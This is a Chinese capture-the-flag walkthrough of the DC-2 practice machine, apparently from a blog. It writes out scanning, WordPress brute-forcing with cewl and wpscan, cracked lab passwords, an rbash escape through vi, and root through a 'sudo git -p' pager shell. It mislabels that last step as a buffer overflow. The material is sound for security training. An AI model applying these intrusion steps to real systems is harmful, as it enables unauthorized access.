DC-2

标签：bin __ git DC cat ___ txt

重定向

发现主机：

Host is up (0.000063s latency).
Nmap scan report for 192.168.88.138

扫描端口发现

PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu

查看7744端口的详细信息 发现是ssh

nmap -p- 192.168.88.138 -A

访问80端口 访问不了会自动跳到DC-2 应该是给重定向了 ->dns绑定

访问本地hosts
C:\Windows\System32\drivers\etc
修改hosts文件
192.168.88.138 dc-2

kali vim /etc/hosts

Flag 1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

---

Cewl使用、wpscan使用

Cewl是一款采用Ruby开发的应用程序，可以利用网站信息生成字典，之后可以把字典用到密码破解工具中。

cewl http://dc-2/ > pass.txt

获得密码之后需要账号和登录框，利用Kali自带的专注于Wordpress的扫描工具wpscan 来枚举用户名字

wpscan --url http://dc-2/ -e u

创建文本保存账号 admin\jerry\tom

touch user.txt

扫描目录 - 后台登录框

dirb是一个基于字典的web目录扫描工具

dirb http://dc-2

直接爆破

wpscan --url http://dc-2/ -U user.txt -P pass.txt

[SUCCESS] - jerry / adipiscing                                               
[SUCCESS] - tom / parturient  

翻一下发现

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

---

rbash提权、 $PATH

意思是说后台网站无法利用，试图利用一下7744端口

ssh [email protected] -p 7744 

问题1 登陆成功后发现cat命令没法用，如下

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

-rbash：是受限制的shell

查看可以用什么命令

ls home/tom/usr/bin
less ls scp vi

思路是将shell 改为/bin/sh (尝试vi绕过)

:set shell=/bin/sh
:shell

问题2 /bin/sh: 2: cat: not found 没有cat命令执行文件的路径

$ ls
flag3.txt  usr
$ cat flag3.txt
/bin/sh: 2: cat: not found

查一下执行文件有哪些

cat $PATH

此时设置一下路径

export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin

Flag3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he cause

---

su

暗示需要切换

$ su jerry
Password: 
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
进入到jerry的家目录

jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

---

git提权

这里提示用git提权拿下最终flag

git存在缓冲区溢出漏洞，在使用sudo git -p时，不需要输入root密码即可使用root权限执行命令

sudo git -p

利用分页显示

!/bin/sh
# whoami
root
# cd ~
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

标签：bin,__,git,DC,cat,___,txt
From： https://www.cnblogs.com/nagoya/p/16954949.html